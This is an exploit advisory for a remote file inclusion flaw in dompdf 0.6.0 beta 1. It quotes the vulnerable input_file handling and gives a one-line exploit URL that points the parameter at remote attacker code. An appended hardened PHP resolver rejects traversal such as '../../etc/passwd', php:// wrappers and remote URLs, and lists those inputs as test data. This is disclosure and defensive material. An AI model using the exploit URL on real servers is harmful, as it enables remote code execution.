Dompdf 0.6.0 Beta 1 Remote File Inclusion

2010-09-01T00:00:00
ID PACKETSTORM:93391
Type packetstorm
Reporter Andre Corleone
Modified 2010-09-01T00:00:00

Description

                                        
==================================
apps dompdf RFI Vulnerability  
==================================  
  
====================================================  
[x] ExpL0it TitLe : apps dompdf RFI Vulnerability  
[x] DatE : 01 September 2010  
[x] AutH0r : Andre_Corleone  
[x] Software Link : www.digitaljunkies.ca/dompdf/  
[x] h0mE : http://tecon-crew.org  
[x] TestEd 0n : linux ubuntu 10.04  
[x] d0rK : :P  
====================================================  
  
==========================================================================================  
[x]bug heRe:  
if ( isset($_GET["input_file"]) )  
$file = rawurldecode($_GET["input_file"]);  
else  
throw new DOMPDF_Exception("An input file is required (i.e. input_file _GET variable).");  
==========================================================================================  
  
==================================================================  
[x]expL0iT:  
http://www.site.com/dompdf/dompdf.php?input_file=[evilc0de.txt?]  
==================================================================  
  
============================================================================================  
[x]th4nKs t0:  
ALLAH SWT,Muhammad SAW,my Parents,my lovely HerliZ Dian Permathasari  
guitariznoize | zee_eichel | jImMYrOmAnTiCdEvIl | 45tr0_k1ll1n9 | all Tecon Crew | and you  
============================================================================================  
  
=====================  
[x]Jakarta,Indonesia  
=====================  
  
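A hardened form of the input_file handling quoted under "bug heRe", as an added example that is not part of the original advisory or of dompdf's own code. The function name resolveInputFile(), the temporary base directory and the html/htm allow-list are assumptions made for illustration.

```php
<?php
// Added example, not dompdf's code. resolveInputFile() and the base
// directory used below are hypothetical names chosen for this sketch.

/**
 * Map a user-supplied input_file value to a local file under $baseDir,
 * or throw. Remote URLs and PHP stream wrappers are never accepted.
 */
function resolveInputFile(string $raw, string $baseDir): string
{
    $name = rawurldecode($raw);

    // Reject NUL bytes and anything carrying a scheme (http:, ftp:, php:, data:, ...).
    if (strpos($name, "\0") !== false || preg_match('#^[a-z][a-z0-9+.\-]*:#i', $name)) {
        throw new InvalidArgumentException('input_file must be a local file name');
    }

    // Only the document types the converter is meant to read.
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, ['html', 'htm'], true)) {
        throw new InvalidArgumentException('input_file has an unexpected extension');
    }

    // Canonicalise both paths so ../ sequences and symlinks cannot escape $baseDir.
    // realpath() returns false when the file does not exist.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new InvalidArgumentException('input_file is outside the allowed directory');
    }
    return $path;
}

// Constructed sample inputs; the demo builds its own temporary base directory.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'dompdf-input-' . getmypid();
@mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'report.html', '<p>ok</p>');

$samples = ['report.html', 'http://example.invalid/x.txt?', '../../etc/passwd',
            'php://filter/resource=report.html', 'missing.html'];
foreach ($samples as $candidate) {
    try {
        echo $candidate, ' => ', resolveInputFile($candidate, $base), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo $candidate, ' => rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

Only the first sample resolves to a path; the remote URL, the wrapper, the traversal attempt and the missing file are all rejected before anything is opened.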